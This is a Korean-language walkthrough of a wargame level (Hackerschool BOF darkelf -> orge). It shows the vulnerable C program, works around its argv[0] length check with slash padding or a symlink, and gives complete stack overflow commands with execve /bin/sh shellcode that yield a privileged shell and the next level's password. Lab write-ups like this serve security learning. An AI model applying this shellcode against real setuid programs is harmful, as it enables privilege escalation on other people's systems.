hackerschool bof 원정대 darkelf -> orge

LEVEL7 (darkelf -> orge) : check argv[0]

argv[0]이면 파일명인데 과연 어떤 문제일까

[darkelf@localhost darkelf]$ cat orge.c #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) {         char buffer[40];         int i;         if(argc < 2){                 printf("argv error\n");                 exit(0);         }         // here is changed!         if(strlen(argv[0]) != 77){                 printf("argv[0] error\n");                 exit(0);         }         // egghunter         for(i=0; environ[i]; i++)                 memset(environ[i], 0, strlen(environ[i]));         if(argv[1][47] != '\xbf')         {                 printf("stack is still your friend.\n");                 exit(0);         }         // check the length of argument         if(strlen(argv[1]) > 48){                 printf("argument is too long!\n");                 exit(0);         }         strcpy(buffer, argv[1]);         printf("%s\n", buffer);         // shellcode hunter         memset(buffer, 0, 40); }

중간에 주석으로 // here is changed! 가 보인다.
파일명이 77글자가 되지 않으면 파일을 종료시켜버린다. check argv[0]이라길래 egghunter, bufferhunter가 없을줄 알았는데 그대로 있다. 역시 공격은 argv[1]영역을 노리는 것인데 파일명만 77글자이여야 된다.

공격 방법은 전과 동일하나 argv[0]은 이런식으로 쓰면 된다.

[darkelf@localhost .izayoi]$ .////////////////////////////////////////////////////////////////////////orge `perl -e 'print "\xbf"x48'` ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ Segmentation fault (core dumped) [darkelf@localhost .izayoi]$ gdb -c core -q Core was generated by `.////////////////////////////////////////////////////////////////////////orge ¿'. Program terminated with signal 11, Segmentation fault. #0  0xbfbfbfbf in ?? () (gdb)

../../../.././././../../ 이런식의 공격도 가능할 것이다.(아마 이 방법은 home/darkelf/orge라는 글자를 추가시켜야되겠지만.
또 하나 실험을 해봤는데 이런 밑의 경우도 가능할 것 같다. ( 심볼릭 링크 이용 )

[darkelf@localhost .izayoi]$ ln -s orge aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [darkelf@localhost .izayoi]$ ls -al total 92 drwxrwxr-x    2 darkelf  darkelf      4096 Jan 13 20:48 . drwx------    3 darkelf  darkelf      4096 Jan 13 20:41 .. lrwxrwxrwx    1 darkelf  darkelf         4 Jan 13 20:48 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -> orge -rw-------    1 darkelf  darkelf     61440 Jan 13 20:44 core -rwsr-sr-x    1 darkelf  darkelf     12700 Jan 13 20:42 orge -rw-r--r--    1 darkelf  darkelf       701 Jan 13 20:42 orge.c [darkelf@localhost .izayoi]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `perl -e 'print "\xbf"x48'` ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ Segmentation fault (core dumped)

이제 공격 방법에 대해서는 알고있고 이전 문제와 비슷하기때문에 따로 gdb를 이용한 분석은 빼겠다.

[darkelf@localhost darkelf]$ .////////////////////////////////////////////////////////////////////////orge `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x9c\xfb\xff\xbf"'` 1ÀPh//shh/bin‰ãPS‰á™°                      Í€œûÿ¿ bash$ id uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf) bash$ my-pass euid = 507 timewalker [darkelf@localhost darkelf]$ ./aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x98\xfb\xff\xbf"'` 1ÀPh//shh/bin‰ãPS‰á™°                      Í€˜ûÿ¿ bash$ id uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf) bash$ my-pass euid = 507 timewalker

두가지 방법 다 패스워드를 획득했다.